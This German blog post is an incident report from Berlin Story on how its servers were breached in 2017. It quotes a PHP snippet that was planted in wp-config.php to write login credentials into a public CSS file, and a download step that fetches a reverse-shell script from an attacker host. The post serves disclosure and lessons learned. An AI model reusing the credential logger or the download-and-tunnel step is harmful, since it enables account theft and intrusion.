Berlin Story Hack, nächstes Up date

Enno Lenze berichtet:

Da immer wieder Leute fragen, wie der Hack technisch abgelaufen ist und warum wir unsere Backups auf der Website haben (was wir natürlich nicht haben…) hier nochmal ein paar Details:

Der Angreifer hat erst geguckt, welche Domains auf uns registriert sind. Dann hat er geprüft, welche auf dem gleichen Server liegen. Diese hat er nach Sicherheitslücken durchsucht. Eine der anderen Installationen hatte ein veraltetes Plugin, zu dem eine Lücke bekannt war. Die Lücke wurde mit DirBuster[1] gefunden. Anschließen wurde über die Lücke von http://93.190.137.xxx/rev.py.txt%20-O%20/tmp/b Schadsoftware nachgeladen und mit dieser ein Reverse-Tunnel auf 93.190.137.xxx:2121 aufgebaut. Dies machte der Angreifer über die IP-Adresse 81.171.85.xxx, welche ipvanish.com gehört, einem Anonymisierungsdienst. Weitere Kontakte kamen über einen Server mit der IP-Adresse 217.23.3.xxx, welcher vermutlich vorher schon übernommen wurde und nur als Proxy gedient hat. Anschließend wurde die wp-config.php von berlinstory.de so geändert, dass sie die eingegebenen ugangsdaten in eine öffentlich einsehbare CSS Datei schreibt.
function logla($kul,$pas)
$dosya=fopen(„XXX.css“,“a+“);
fwrite($dosya, „kullanici : „.$kul.“ sifre : „.$pas.“n“);
fclose($dosya);
Durch den Zugang zum Dateisystem kamen sie auch an die Konfigurationsdateien für die Backups und an die .bash_history – eine Datei in der die zuletzt benutzen Befehle liegen. Jeder Admin wird gerade die Peitsche raus holen und mich jagen wollen, weil dort der Hostname und Benutzername des Backupservers drin lagen – aber shit happens. So ging es also weiter zum Backupserver (online, klar) der dann auch weg war. Es bestehen aber offline Backups, die je nach Projekt ein bis vier Wochen alt sind und die man teilweise zusammensuchen und vergleichen muss.

 

Update NEU (18. April 2017, 20 Uhr)

Inzwischen wird der Hack vom Nationalen Cyberabwehrzentrum bearbeitet. Wir haben alle verfügbaren Daten rüber geworfen und warten mal ab, was zurück kommt.